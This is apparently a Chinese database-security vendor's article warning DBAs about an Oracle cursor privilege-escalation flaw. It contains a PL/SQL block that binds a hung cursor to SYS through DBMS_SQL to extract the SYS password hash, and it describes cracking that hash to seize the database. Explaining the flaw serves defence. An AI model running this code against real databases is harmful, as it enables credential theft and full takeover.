數(shù)據(jù)安全治理關(guān)鍵技術(shù)之?dāng)?shù)據(jù)庫(kù)脫敏技術(shù)詳解
數(shù)據(jù)安全治理之API監(jiān)測(cè)系統(tǒng) ,解決API接口安全問(wèn)題【安華金和】
新一代數(shù)據(jù)庫(kù)脫敏技術(shù),為敏感數(shù)據(jù)建立保護(hù)盾!
數(shù)據(jù)庫(kù)脫敏系統(tǒng)與金融行業(yè)案例解讀
數(shù)據(jù)安全治理建設(shè)思路的著力點(diǎn)——數(shù)據(jù)安全咨詢服務(wù)【安華金和】
數(shù)據(jù)庫(kù)防火墻功能有哪些?-數(shù)據(jù)安全-安華金和
數(shù)據(jù)安全關(guān)鍵技術(shù)之?dāng)?shù)據(jù)庫(kù)脫敏技術(shù)詳解【安華金和】
中國(guó)數(shù)據(jù)安全治理落地指導(dǎo)書(shū)籍《數(shù)據(jù)安全治理白皮書(shū)5.0》正式發(fā)布(附下載)
前文中我們提到Oracle游標(biāo)的數(shù)據(jù)庫(kù)安全隱患之一,如果由于人為原因沒(méi)有及時(shí)關(guān)閉游標(biāo),黑客可以通過(guò)對(duì)制造異常,使游標(biāo)持續(xù)處于被掛起狀態(tài),然后進(jìn)行惡意代碼注入。再利用游標(biāo)自身的高權(quán)限執(zhí)行惡意代碼,進(jìn)行越權(quán)或者非法提權(quán)操作。本文我們針對(duì)游標(biāo)提權(quán)漏洞進(jìn)行實(shí)例分析。
游標(biāo)提權(quán)漏洞就是在上面的基礎(chǔ)上利用被掛起的游標(biāo),通過(guò)類似DBMS_SQL這種由系統(tǒng)定義的包,把游標(biāo)語(yǔ)句和高權(quán)限用戶進(jìn)行綁定。接著上面的例子通過(guò)DBMS_SQL綁定SYS,用戶直接獲取SYS的密碼HASH。
SQL> DECLARE
2 CURSOR_NAME INTEGER;
3 I INTEGER;
4 PWD VARCHAR2(30);
5 BEGIN
6 CURSOR_NAME:=3241423;
7 DBMS_SQL.BIND_VARIABLE(CURSOR_NAME,':schina','SYS');
8 DBMS_SQL.DEFINE_COLUMN(CURSOR_NAME,1,PWD,30);
9 I:=DBMS_SQL.EXECUTE(CURSOR_NAME);
10 IF DBMS_SQL.FETCH_ROWS(CURSOR_NAME)>0 THEN
11 DBMS_SQL.COLUMN_VALUE(CURSOR_NAME,1,PWD);
12 END IF;
13 DBMS_SQL.CLOSE_CURSOR(CURSOR_NAME);
14 DBMS_OUTPUT.PUT_LINE ('PWD:'||PWD);
15 END;
16 /
上述代碼是在獲取游標(biāo)值的前提下進(jìn)行的,因此在代碼聲明的地方寫入游標(biāo)值3241423。使用DBMS_SQL中的BIND_VARIABLE(cursor_name,':schina',sys)將游標(biāo)和SYS用戶綁定。這樣執(zhí)行查詢SYS用戶。后臺(tái)數(shù)據(jù)庫(kù)真正運(yùn)行的語(yǔ)句是:select password from sys.dba_users where username='sys'。DBMS_SQl.define_column函數(shù)的作用是將游標(biāo)中第一列的值返回給PWD變量。黑客在執(zhí)行完上述匿名塊后,系統(tǒng)結(jié)果返回SYS密碼的HASH散列,使用HASH逆向工具進(jìn)行轉(zhuǎn)換就可以獲得SYS密碼明文,直接奪取數(shù)據(jù)庫(kù)最高權(quán)限。
至此,對(duì)游標(biāo)漏洞的提權(quán)完成,黑客獲取數(shù)據(jù)庫(kù)最高權(quán)限,那么真正的數(shù)據(jù)庫(kù)安全危機(jī)也正式爆發(fā)。利用數(shù)據(jù)庫(kù)最高權(quán)限,黑客可以對(duì)數(shù)據(jù)庫(kù)中的核心數(shù)據(jù)整庫(kù)拿走或進(jìn)行增刪改查等關(guān)鍵動(dòng)作,造成一系列嚴(yán)重后果。通過(guò)此文的分析,希望對(duì)DBA等數(shù)據(jù)庫(kù)管理人員予以警示。
試用申請(qǐng)
在線咨詢
咨詢電話
TOP